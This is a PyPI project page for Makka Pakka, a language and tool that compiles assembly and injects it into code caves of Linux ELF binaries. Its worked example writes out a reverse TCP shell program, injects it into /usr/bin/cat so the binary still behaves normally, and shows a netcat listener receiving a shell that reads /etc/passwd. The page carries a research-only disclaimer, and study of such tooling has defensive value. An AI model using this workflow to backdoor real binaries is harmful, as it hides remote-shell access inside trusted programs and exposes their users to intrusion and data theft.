Skip to main content

A programming language for injecting code into ELF files.

Project description

Makka Pakka

Makka pakka is a programming language which transpiles into Intel assembly. Makka pakka programs are specifically written to be embedded within a target linux binary (ELF file). The language contains a submodule which autmatically injects the compiled code into a code cave of the target program.

To learn more, please visit the documentation page.

Disclaimer

This project was created purely for research purposes. You do not have permission to use this program for malicious code injection.

Installation

Makka Pakka only works on Linux. Trying to run it on other operating systems will not work.

Makka pakka is distributed as a package on PyPi.

To install, use pip:

pip install MakkaPakka

You should then have access to three commands: mkpk, mkpk-transpile, elf-caver.

Test them out!

mkpk --help
Usage: mkpk [OPTIONS] MKPK_FILEPATH TARGET_BINARY

Options:
-o, --output-file TEXT  The filepath to output the injected binary to.
-n, --patch-entrypoint  Patches the entrypoint to point to injected code.
-e, --patch-exit        Patches the process exit to point to the injected
                        code.
-v, --verbose           Logs a verbose output to stdout.
--help                  Show this message and exit.
mkpk-transpile --help
Usage: mkpk-transpile [OPTIONS] MKPK_FILEPATH

Options:
-o, --output TEXT  The filepath to output the transpiled makka pakka code to.
--help             Show this message and exit.
elf-caver --help
Usage: elf-caver [OPTIONS]

Options:
-a, --asm-file TEXT     The filepath of the .asm file to inject.  [required]
-t, --target-file TEXT  The filepath of the binary to inject into.
                        [required]
-o, --output-file TEXT  The filepath to output the injected binary to.
                        [required]
-n, --patch-entrypoint  (Optional) Patches the entrypoint to point to
                        injected code.
-e, --patch-exit        (Optional) Patches the process exit to point to the
                        injected code.
--help

Example

This example shows how makka pakka can be used to inject a reverse TCP shell into a standard linux binary (/usr/bin/cat).

Creating a Makka Pakka program file:

----- reverse_tcp.mkpk -----

!link ../lib/stdlib/network.mkpk
!link ../lib/stdlib/syscall.mkpk
!link ../lib/stdlib/shell.mkpk

[[data]]
PORT: 0xb315
LOCALHOST_ADDR: 0x0100007f

[[code]]
[main]
> sys_socket ${AF_INET} ${SOCK_STREAM} 0x0
mov r9, rax
> sockaddr_init "LOCALHOST_ADDR" "PORT" ${AF_INET}
> sys_connect r9 rsp 0x10
> dup_stdstreams r9
> bin_bash
> sys_exit

Compiling the Makka Pakka program into /usr/bin/cat:

mkpk reverse_tcp.mkpk /usr/bin/cat -e -o cat_inject
Injecting assembly from cat_inject.asm into cat_inject.
Injected file output to cat_inject.mkpk reverse_tcp.mkpk

Setting up a listener on localhost:5555:

nc -l localhost 5555

Then run the injected cat binary, it looks inconspicuous! but...

./cat_inject --help
Usage: ./cat_inject [OPTION]... [FILE]...
Concatenate FILE(s) to standard output.

With no FILE, or when FILE is -, read standard input.

  -A, --show-all           equivalent to -vET
  -b, --number-nonblank    number nonempty output lines, overrides -n
  -e                       equivalent to -vE
  -E, --show-ends          display $ at end of each line
  -n, --number             number all output lines
  -s, --squeeze-blank      suppress repeated empty output lines
  -t                       equivalent to -vT
  -T, --show-tabs          display TAB characters as ^I
  -u                       (ignored)
  -v, --show-nonprinting   use ^ and M- notation, except for LFD and TAB
      --help     display this help and exit
      --version  output version information and exit

Examples:
  ./cat_inject f - g  Output f's contents, then standard input, then g's contents.
  ./cat_inject        Copy standard input to standard output.

GNU coreutils online help: <https://www.gnu.org/software/coreutils/>
Report any translation bugs to <https://translationproject.org/team/>
Full documentation <https://www.gnu.org/software/coreutils/cat>
or available locally via: info '(coreutils) cat invocation'

Now the netcat listener has a remote TCP shell!

nc -l localhost 5555
whoami
alex
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:102:105::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
syslog:x:104:111::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:107:113::/nonexistent:/usr/sbin/nologin
alex:x:1000:1000:,,,:/home/alex:/bin/bash

Development Installation

If you wish to contribute to Makka Pakka, then these are the instruction for downloading the source and setting up the dev environment

Prerequisite installs:

  • Python 3.10+
  • Netwide Assembler (NASM)

Clone the git repository and configure the environment.

cd <your directory>
git clone https://github.com/PandasAreBears/MakkaPakka
cd MakkaPakka
source configure.sh

At this point you can use Makka Pakka from within this directory.

python3 src/mkpk.py --help

For more examples, or a more detailed technical explaination, please check out the documentation page.

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

MakkaPakka-1.0.4.tar.gz (65.8 kB view details)

Uploaded Source

Built Distribution

MakkaPakka-1.0.4-py3-none-any.whl (61.9 kB view details)

Uploaded Python 3

File details

Details for the file MakkaPakka-1.0.4.tar.gz.

File metadata

  • Download URL: MakkaPakka-1.0.4.tar.gz
  • Upload date:
  • Size: 65.8 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/4.0.2 CPython/3.10.6

File hashes

Hashes for MakkaPakka-1.0.4.tar.gz
Algorithm Hash digest
SHA256 3dd9aa01eb5b5f10e8382ce4d841eb49eb217102096da0bc0d1fce6b86775188
MD5 6c76126b3a680d7615271588c4066ca1
BLAKE2b-256 91fb4bc398e43250b00281c18289363f67419432fe713f8affd708b07bd27726

See more details on using hashes here.

File details

Details for the file MakkaPakka-1.0.4-py3-none-any.whl.

File metadata

  • Download URL: MakkaPakka-1.0.4-py3-none-any.whl
  • Upload date:
  • Size: 61.9 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/4.0.2 CPython/3.10.6

File hashes

Hashes for MakkaPakka-1.0.4-py3-none-any.whl
Algorithm Hash digest
SHA256 c95e2cc77320763e7dda7ff17458846ddea10858178e1113154c28a8ee1e3e56
MD5 809be56765b29482b05456fda110b626
BLAKE2b-256 0c64fc7d3c42f1298ae48da21f3c7a99ee9847d0e068ad219d547d5c78f34aff

See more details on using hashes here.

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page